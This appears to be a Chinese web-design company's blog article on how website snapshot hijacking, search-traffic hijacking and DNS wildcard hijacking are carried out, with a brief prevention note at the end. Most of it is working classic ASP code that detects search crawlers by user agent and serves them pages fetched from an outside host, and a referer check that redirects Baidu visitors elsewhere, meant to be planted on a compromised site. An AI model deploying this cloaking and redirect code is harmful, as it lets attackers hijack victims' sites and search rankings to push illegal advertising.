网站引擎劫持,网站快照劫持,新闻源劫持如何操作与防范

时间:2023-08-29

前不久见到有网民问网址模块劫持,网站快照劫持,百度新闻源劫持是怎么操作的。结论大部分朋友都表明不了解,我今天来跟大伙儿分享一下网址劫持是怎么操作的,如何防范。

1.网站快照劫持

动态页面主页根据在PHP或是ASP,ASPX文档中加上分辨编码,分辨如果是蜘蛛浏览就修改标题具体内容,在文章标题具体内容载入联系电话和违法广告宣传信息,要不是蜘蛛浏览也不做改动。

静态网页主页,在下午三点上下删除你的.html文件,加上inde.php,php中载入相近上边的句子,如果是蜘蛛就回到修改了文章标题的主页具体内容,并不是就回到正常的具体内容。

快照更新劫持较为反感,即使你修补了劫持,百度搜索上依然会表明很长一段时间的违法快照更新信息。

编码如下所示:

<%

function GetBot()

'查看蜘蛛

dim s_agent

GetBot=""

s_agent=Request.ServerVariables("HTTP_USER_AGENT") '重要判断语句

if instr(1,s_agent,"googlebot",1) >0 then

GetBot="google"

end if

if instr(1,s_agent,"msnbot",1) >0 then

GetBot="MSN"

end if

if instr(1,s_agent,"slurp",1) >0 then

GetBot="Yahoo"

end if

if instr(1,s_agent,"baiduspider",1) >0 then

GetBot="baidu"

end if

if instr(1,s_agent,"sohu-search",1) >0 then

GetBot="Sohu"

end if

if instr(1,s_agent,"lycos",1) >0 then

GetBot="Lycos"

end if

if instr(1,s_agent,"robozilla",1) >0 then

GetBot="Robozilla"

end if

end function

Function getHTTPPage(Path)

t = GetBody(Path)

getHTTPPage=BytesToBstr(t,"GB2312")'编号

End function

Function Newstring(wstr,strng)

Newstring=Instr(lcase(wstr),lcase(strng))

if Newstring<=0 then Newstring=Len(wstr)

End Function

Function GetBody(url)

on error resume next

Set Retrieval = CreateObject("Microsoft.XMLHTTP")

With Retrieval

.Open "Get", url, False, "", ""

.Send

GetBody = .ResponseBody

End With

Set Retrieval = Nothing

End Function

Function BytesToBstr(body,Cset)

dim objstream

set objstream = Server.CreateObject("adodb.stream")

objstream.Type = 1

objstream.Mode =3

objstream.Open

objstream.Write body

objstream.Position = 0

objstream.Type = 2

objstream.Charset = Cset

BytesToBstr = objstream.ReadText

objstream.Close

set objstream = nothing

End Function

Dim wstr,str,url,start,over,dtime

if GetBot="baidu" then

'给百度搜索蜘蛛订制的具体内容

url="http://baidu.seowhy.com"

'要想展现给蜘蛛的网页详细地址

wstr=getHTTPPage(url)

body=wstr

response.write ""&body&""

response.end

elseif GetBot="google" then

'给google 蜘蛛订制的具体内容

url="http://baidu.seowhy.com"

wstr=getHTTPPage(url)

body=wstr

response.write ""&body&""

response.end

end if

2.百度搜索引擎总流量劫持

这类劫持比快照更新劫持简易,同时在主页加上,分辨浏览归路是百度搜索引擎或是其他的JS源代码,当归路是百度搜索引擎的过程中就自动跳转到目标站。

编码如下所示:

<%

ifinstr(Request.ServerVariables("http_referer"),"www.baidu.com")>0then

'假如客户来自www.baidu.com

response.redirect("http://baidu.seowhy.com/")

'自动跳转特定详细地址

end if

%>

3.DNS大白菜站劫持

在解析域名里加上泛分析到目的详细地址,在总体目标详细地址服务器上很多形成劫持网站域名的分站。

汇总:1和2必须得到网址的WEBSHELL或是FTP,假如赢得了百度新闻源网址的这类管理权限,就能做百度新闻源劫持;3必须得到DNS管理方法账号。因此导致网址被劫持的主要因素或是自身网址被侵入,或是被扫FTP的挖机扫出来了FTP账号等,网络信息安全没搞好的缘故。因此只需网络信息安全及时,别人是劫持不你的企业网站的。欢迎大家持续关注专业网站建设企业的网址,希望大家可以经思洋的网址初中到物品,提升自身的专业知识。

文章标签:

Copyright © 2016 广州思洋文化传播有限公司,保留所有权利。 粤ICP备09033321号

与项目经理交流
扫描二维码
与项目经理交流
扫描二维码
与项目经理交流
ciya68